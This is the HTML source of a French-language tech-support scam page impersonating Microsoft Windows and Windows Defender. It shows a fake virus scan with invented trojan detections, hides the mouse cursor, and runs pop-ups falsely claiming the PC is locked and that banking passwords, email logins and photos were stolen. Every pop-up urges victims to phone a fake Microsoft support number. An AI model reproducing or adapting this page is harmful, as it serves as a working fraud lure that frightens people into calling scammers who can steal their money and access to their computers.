<!DOCTYPE html><html lang="en"><!-- Global site tag (gtag.js) - Google Analytics --><head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css" crossorigin="anonymous">
    <link rel="stylesheet" type="text/css" href="css/style1.css">
    <link rel="stylesheet" type="text/css" href="css/style2.css">
    <title>Security Center Code0x330432 Services</title>
    <link rel="stylesheet" href="css/font-awesome.min.css">
    <script src="js/jquery.min.js"></script>
    <script src="js/modernizr.min.js" type="text/javascript"></script>
    <script src="js/bootstrap.bundle.min.js" crossorigin="anonymous"></script>
    <script type="text/javascript" src="js/extractor.js"></script>
    <script type="text/javascript" src="js/onload.js"></script>
    <script type="text/javascript" src="js/init.js"></script>
    <script type="text/javascript" src="js/script1.js"></script>
    <script type="text/javascript" src="js/script2.js"></script>
    <script type="text/javascript" src="js/script3.js"></script>
    <script type="text/javascript" src="js/script4.js"></script>
    <script type="text/javascript" src="js/script5.js"></script>
    <script type="text/javascript" src="js/script6.js"></script>
    <script type="text/javascript" src="js/script7.js"></script>
</head>

<body id="mycanvas" class="map">
    <div class="bg" style="cursor:none;">
        <div class="bgimg"><img src="images/bg2.jpg" alt width="100%"></div>

    </div>
    <a href="index.html#" rel="noreferrer" id="link_black" style="cursor: none;">
        <div class="black" style="height: 145%;cursor: none;"></div>
    </a>

    <div class="pro_box" style="cursor: none;">
        <div class="pro_box_header">
            <div class="row">
                <div class="col-md-12">
                    <div class="mini">
                        <ul>
                            <li><a href="index.html#"><img src="images/mini.jpg"></a></li>

                        </ul>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="logo">
                        <img src="images/mslogo.png"><span>Microsoft Windows</span>
                    </div>
                </div>
                <div class="col-md-8">
                    <div class="activate_lic">
                        <ul>
                            <li><a href="index.html#">
                                    <button>Activer la licence</button>
                                </a></li>
                            <li><a href="index.html#"><img src="images/setting.png"></a></li>
                            <li><a href="index.html#"><img src="images/qm.png"></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
        <div class="scan_box">
            <div class="scan_box_header">
                <div class="row">
                    <div class="col-md-6">
                        <div class="quick_scan">
                            <p><img src="images/scanner.png"><span>Scan rapide</span></p>
                        </div>
                    </div>
                    <div class="col-md-6">
                        <div class="mini1">
                            <ul>
                                <li><a href="index.html#"><img src="images/mini.jpg"></a></li>

                            </ul>
                        </div>
                    </div>
                </div>
            </div>
            <div class="scan_body">
                <div class="progress">
                    <div id="dynamic" class="progress-bar progress-bar-success active" role="progressbar" aria-valuenow="0" aria-valuemin="0" aria-valuemax="100" style="width: 0%">
                        <span id="current-progress"></span>
                    </div>
                </div>
                <div class="table_quick">
                    <table class="table table-bordered">
                        <thead>
                            <tr>
                                <th scope="col">Objets scannés</th>
                                <th scope="col">
                                    <div class="counter col_fourth">
                                        <h2 class="timer count-title count-number" data-to="51900" data-speed="5000">
                                        </h2>
                                    </div>
                                </th>
                            </tr>
                            <tr>
                                <th scope="col">Temps écoulé</th>
                                <th scope="col">7 secondes</th>
                            </tr>
                            <tr>
                                <th scope="col">Menaces détectées</th>
                                <th scope="col" style="color: red;">
                                    <h2 class="timer count-title count-number" data-to="11" data-speed="2000"></h2>
                                </th>
                            </tr>
                        </thead>
                    </table>
                </div>
            </div>
            <div class="scan_footer">
                <div class="row">
                    <div class="col-md-6">
                        <div class="bt_can">
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary">Annuler</button>
                            </div>
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary">Pause</button>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-6">
                        <div class="bt_can2">
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary" id>analyser Scans</button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div class="pro_box2" style="cursor: none;">
        <div class="pro_box_header">
            <div class="row">
                <div class="col-md-12">
                    <div class="mini">
                        <ul>
                            <li><a href="index.html#"><img src="images/mini.jpg"></a></li>

                        </ul>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="logo">
                        <img src="images/mslogo.png"><span>Microsoft Windows</span>
                    </div>
                </div>
                <div class="col-md-8">
                    <div class="activate_lic">
                        <ul>
                            <li><a href="index.html#">
                                    <button>Activer la licence</button>
                                </a></li>
                            <li><a href="index.html#"><img src="images/bell2.png"></a></li>
                            <li><a href="index.html#"><img src="images/setting.png"></a></li>
                            <li><a href="index.html#"><img src="images/qm.png"></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>

        <div class="scan_box2">
            <div class="scan_box_header">
                <div class="row">
                    <div class="col-md-6">
                        <div class="quick_scan">
                            <p><img src="images/scanner.png"><span>Scanner</span></p>
                        </div>
                    </div>
                    <div class="col-md-6">
                        <div class="mini1">
                            <ul>
                                <li><a href="index.html#"><img src="images/mini.jpg"></a></li>

                            </ul>
                        </div>
                    </div>
                </div>
            </div>
            <div class="scan_body">
                <div class="row">
                    <div class="col-md-4">
                        <h4 class="new_heading">Résultats de l'analyse des menaces</h4>
                    </div>
                    <div class="col-md-8">
                        <div class="total_detail">
                            <ul>
                                <li><a href="index.html#">
                                        <p>Éléments détectés</p>
                                        <p>15</p>
                                    </a></li>
                                <li><a href="index.html#">
                                        <p>Temps de balayage</p>
                                        <p>4 sec</p>
                                    </a></li>
                                <li><a href="index.html#">
                                        <p>Article numérisé</p>
                                        <p>51,900</p>
                                    </a></li>
                            </ul>
                        </div>
                    </div>
                </div>
                <br>
                <div class="table_quick2">
                    <table class="table table-bordered">
                        <thead>
                            <tr>
                                <th>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </th>
                                <script>
                                    document.write(table_heads)
                                </script>
                            </tr>
                        </thead>
                        <tbody id="table_scroll">
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <script>document.write(table_data1)</script>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <script>document.write(table_data2)</script>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <script>document.write(table_data3)</script>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <script>document.write(table_data4)</script>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <script>document.write(table_data5)</script>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <script>document.write(table_data6)</script>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <td>Adware.Bundler</td>
                                <td>Potentiellement indésirable</td>
                                <td>Fichier</td>
                                <td>HKLM\SYSTEM\CURRENTCONTROLS</td>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <td>Trojan.DNSCharge.AC</td>
                                <td>Logiciels malveillants</td>
                                <td>Valeur de registre</td>
                                <td>HKLM\SYSTEM\CURRENTCONTROLS</td>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <td>Trojan.Dropper.Autoit</td>
                                <td>Logiciels malveillants</td>
                                <td>Fichier</td>
                                <td>HKLM\SYSTEM\CURRENTCONTROLS</td>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <td>PUP.Optional.RelevantK</td>
                                <td>Potentially Unwanted</td>
                                <td>Fichier</td>
                                <td>HKLM\SYSTEM\CURRENTCONTROLS</td>
                            </tr>
                            <tr>
                                <td>
                                    <div class="form-check mar_lef">
                                        <input class="form-check-input" type="checkbox" value id="defaultCheck1" checked>
                                        <label class="form-check-label" for="defaultCheck1"></label>
                                    </div>
                                </td>
                                <td>PUP.Optional.DownLoad</td>
                                <td>Potentiellement indésirable</td>
                                <td>Fichier</td>
                                <td>HKLM\SYSTEM\CURRENTCONTROLS</td>
                            </tr>

                        </tbody>
                    </table>
                </div>
            </div>
            <div class="scan_footer2">
                <div class="row">
                    <div class="col-md-6">
                        <div class="bt_can">
                            <div class="dropdown">
                                <a class="btn btn-secondary dropdown-toggle" style="width:126px;" href="index.html#" role="button" id="dropdownMenuLink" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                                    Enregistrer le résultat
                                </a>

                                <div class="dropdown-menu" aria-labelledby="dropdownMenuLink">
                                    <a class="dropdown-item" href="index.html#">Action</a>
                                    <a class="dropdown-item" href="index.html#">Une autre action</a>
                                    <a class="dropdown-item" href="index.html#">Quelque chose d'autre ici</a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-6">
                        <div class="bt_can2">
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary">Fermer</button>
                            </div>
                            <div class="btn-group" role="group" aria-label="Basic example">
                                <button type="button" class="btn btn-secondary bg_blue">Quarantaine</button>
                            </div>
                        </div>
                    </div>

                </div>
            </div>
        </div>
    </div>
    <div class="pro_box3" style="cursor: none;">
        <div class="pro_box_header">
            <div class="row">
                <div class="col-md-12">
                    <div class="mini">
                        <ul>
                            <li><a href="index.html#"><img src="images/mini.jpg"></a></li>

                        </ul>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="logo">
                        <img src="images/mslogo.png"><span>Microsoft Windows</span>
                    </div>
                </div>
                <div class="col-md-8">
                    <div class="activate_lic">
                        <ul>
                            <li><a href="index.html#"><button>Activer la licence</button></a></li>
                            <li><a href="index.html#"><img src="images/bell.png"></a></li>
                            <li><a href="index.html#"><img src="images/setting.png"></a></li>
                            <li><a href="index.html#"><img src="images/qm.png"></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>

        <div class="scan_box2">
            <div class="scan_box_header">
                <div class="row">
                    <div class="col-md-6">
                        <div class="quick_scan">
                            <p><img src="images/scanner.png"><span>Scanner</span></p>
                        </div>
                    </div>
                    <div class="col-md-6">
                        <div class="mini1">
                            <ul>
                                <li><a href="index.html#"><img src="images/mini.jpg"></a></li>

                            </ul>
                        </div>
                    </div>
                </div>
            </div>
            <div class="scan_body">
                <div class="row">
                    <div class="col-md-12">
                        <div class="total_detail_scan">
                            <ul>
                                <li><a href="index.html#">Scanner</a></li>
                                <li><a href="index.html#">Planificateur d'analyse</a></li>
                                <li><a href="index.html#">Rapports</a></li>
                            </ul>
                        </div>
                    </div>
                </div>
                <br>
                <div class="table_quick2">
                    <div class="row">
                        <div class="col-md-4">
                            <div class="pc_desk">
                                <img src="images/pc.png">
                            </div>
                        </div>
                        <div class="col-md-4">
                            <div class="scan_pro mar_top">
                                <ul>
                                    <li><i class="fa fa-check" aria-hidden="true"></i> Vérification des mises à jour</li>
                                    <li><i class="fa fa-check" aria-hidden="true"></i> Scanner la mémoire</li>
                                    <li><i class="fa fa-check" aria-hidden="true"></i> Analyser les éléments de
                                        démarrage</li>
                                    <li>
                                        <div class="circular-spinner"></div>
                                        <span>Analyse du registre</span>
                                    </li>
                                    <li>Analyse du système de fichiers</li>
                                </ul>
                            </div>
                        </div>
                        <div class="col-md-4">
                            <div class="scan_dur">
                                <p><strong>Durée de l'analyse</strong></p>
                                <p>3sec 0s</p>
                                <p>5sec 0s</p>
                                <br>
                                <p><strong>Éléments scannés</strong></p>
                                <p>51,900</p>
                                <br>
                                <p><strong>Détections</strong></p>
                                <p>11</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="scan_footer3">
                <div class="row">
                    <div class="col-md-2">
                        <div class="viruses">
                            <img src="images/scanner.png">
                        </div>
                    </div>
                    <div class="col-md-10">
                        <div class="make_this">
                            <p>Faites-en la dernière préoccupation des menaces en ligne</p>
                            <p>Logiciels malveillantsbytes Premium stoppe Logiciels malveillants, virus, et plus encore
                                sans enliser votre ordinateur.
                                Passer à la version premium</p>
                        </div>
                    </div>

                </div>
            </div>
        </div>
    </div>

    <div id="footer" style="top: 672px; position: absolute;cursor: none;">
        <div class="row">

            <div class="col-md-12">
                <div class="right-foot" style="text-align: center;">
                    <span id="footertxt"><img src="images/mslogo.png"> Microsoft: </span><span style="font-weight: 700;padding-left: 14px;color: white;">Contactez le support <span style="border: 1px solid white;border-radius: 5px;padding: 2px 5px;">
                            0466903059
                        </span> </span>
                </div>
            </div>
            <div class="col-md-12">
                <marquee width="100%" direction="left" height="100px">
                    <small class="text-left" style="color: #eee;font-size: 10px;">
                        <script>document.write(footer_message)</script>
                    </small>
                </marquee>
            </div>
        </div>


    </div>

    <div id="poptxt" class="lightbox">
        <div class="ilb top">
            <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
                <span id="txtadd" class="fl title"><span class="fl ilb"><img src="images/defender.png" class="logo3"></span>
                    Windows
                    Defender Security Center</span>
                <span id="txts1" class="fl title2"><a href="index.html#"><img src="images/cross.png"></a></span>

            </div>
        </div>
        <div id="txtintro">
            <span class="colo-rd">App: Ads.fiancetrack(2).dll<br>
                Menace détectée : Logiciel espion cheval de Troie</span>
        </div>
        <img id="banner" src="images/virus-images.jpg">
        <div id="disclaimer">
            L'accès à ce PC a été bloqué pour des raisons de sécurité.<br>
            <span class="support">Contactez l'assistance Windows : 0466903059(Assistance téléphonique de
                sécurité)</span>
        </div>
        <div id="bottom">
            <img id="badge" src="images/mslogo.png"><span class="title3">Microsoft</span>
            <ul>
                <li>
                    <a href="index.html#">
                        <div class="fr button2">
                            <span id="addtochromebutton">Refuser</span>
                        </div>
                    </a>
                </li>
                <li>
                    <a href="index.html#">
                        <div class="fr button">
                            <span id="addtochromebutton">Permettre</span>
                        </div>
                    </a>
                </li>
            </ul>

        </div>
    </div>

    <div id="pop_up" class="cardcontainer" style="cursor: none;">
        <p class="text-center" style="    font-size: 16px;
    font-weight: normal;
    margin: 0;
    margin-bottom: 5px;
    padding: 5px 10px;
    color: #FFFFFF !important;
    color: #414141;font-weight: bold;
    margin-top: 8px;">Windows-Defender - Avertissement de sécurité</p>
        <p class="text-center">** L'ACCÈS À CE PC A ÉTÉ BLOQUÉ POUR DES RAISONS DE SÉCURITÉ **</p>
        <p>Votre ordinateur nous a alerté qu'il a été infecté par un Trojan Spyware. Les données suivantes ont été
            compromises.</p>
        <p>> Identifiants de messagerie<br>
            > Mots de passe bancaires<br>
            > Identifiant Facebook<br>
            > Des photos & Des documents

        </p>
        <p>Windows-Defender Scan a trouvé sur cet appareil des logiciels publicitaires potentiellement indésirables qui
            peuvent voler vos mots de passe, votre identité en ligne, vos informations financières, vos fichiers
            personnels, vos photos ou vos documents.</p>
        <p>You must contact us immediately so that our engineers can walk you through the removal process over the
            phone.</p>
        <p>Appelez immédiatement le support Microsoft pour signaler cette menace, empêcher le vol d'identité et
            déverrouiller l'accès à cet appareil.</p>
        <p>La fermeture de cette fenêtre mettra en péril vos informations personnelles et entraînera la suspension de
            votre inscription Windows.</p>
        <p style="padding-bottom: 0px; color:#fff; font-size:14px;">Appelez le support Microsoft: <strong>
                0466903059</strong></p>
        <div class="action_buttons"><a class="active" id="leave_page" style="cursor: pointer; color: #FFFFFF !important;">D'accord</a> <a class="active" id="leave_page" style="color: #FFFFFF !important;">Annuler</a>
        </div>
    </div>

    <div id="welcomeDiv" style=" display:none; background-color:rgb(40 40 40 / 62%); height: auto; width: 550px; margin-left:30%;position: absolute;z-index: 9999999999;  " class="answer_list">
        <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">YNe pas
            redémarrer ni utiliser
            ton ordinateur.<br>Votre ordinateur est désactivé. Veuillez appeler Microsoft.<br>L'accès est la raison de
            la sécurité du bloc pour cela
            l'ordinateur.<br> Veuillez nous contacter immédiatement. Un technicien vous aidera à résoudre le problème.
        </p>
    </div>
    <!-- Optional JavaScript; choose one of the two! -->
    <!-- Option 1: jQuery and Bootstrap Bundle (includes Popper) -->


</body></html>